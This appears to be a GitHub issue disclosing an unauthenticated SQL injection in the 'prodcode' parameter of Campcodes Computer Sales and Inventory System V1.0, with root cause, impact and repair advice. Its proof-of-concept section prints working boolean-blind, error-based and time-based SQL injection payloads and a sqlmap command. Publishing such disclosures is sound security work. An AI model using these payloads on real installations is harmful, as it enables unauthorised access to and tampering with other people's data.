-
Notifications
You must be signed in to change notification settings - Fork 0
Description
Campcodes Computer Sales and Inventory System V1.0 /ComputerSalesInventorySystem/pages/pro_edit1.php SQL injection
NAME OF AFFECTED PRODUCT(S)
- Computer Sales and Inventory System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
- Shr1o
Vulnerable File
- /ComputerSalesInventorySystem/pages/pro_edit1.php
VERSION(S)
- V1.0
Software Link
PROBLEM TYPE
Vulnerability Type
- SQL injection
Root Cause
- A SQL injection vulnerability was found in the '/ComputerSalesInventorySystem/pages/pro_edit1.php ' file of the 'Computer Sales and Inventory System' project. The reason for this issue is that attackers inject malicious code from the parameter 'prodcode' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
Impact
- Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION
- During the security review of "Computer Sales and Inventory System",I discovered a critical SQL injection vulnerability in the "/ComputerSalesInventorySystem/pages/pro_edit1.php " file. This vulnerability stems from insufficient user input validation of the 'prodcode' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability location:
- 'prodcode' parameter
Payload:
Parameter: prodcode (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1&prodcode=20191001" RLIKE (SELECT (CASE WHEN (8318=8318) THEN 20191001 ELSE 0x28 END))-- tvzY&prodname=Lenovo ideapad 20059&description=Windows 8&price=32999&category=7
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1&prodcode=20191001" AND (SELECT 1730 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(1730=1730,1))),0x716a767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hfhf&prodname=Lenovo ideapad 20059&description=Windows 8&price=32999&category=7
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1&prodcode=20191001" AND (SELECT 3512 FROM (SELECT(SLEEP(5)))NdNW)-- jTSA&prodname=Lenovo ideapad 20059&description=Windows 8&price=32999&category=7
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
sqlmap.py -u "http://10.0.0.201/ComputerSalesInventorySystem/pages/pro_edit1.php" --data="id=1&prodcode=20191001&prodname=Lenovo+ideapad+20059&description=Windows+8&price=32999&category=7" --dbs

Suggested repair
-
Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. -
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format. -
Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. -
Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.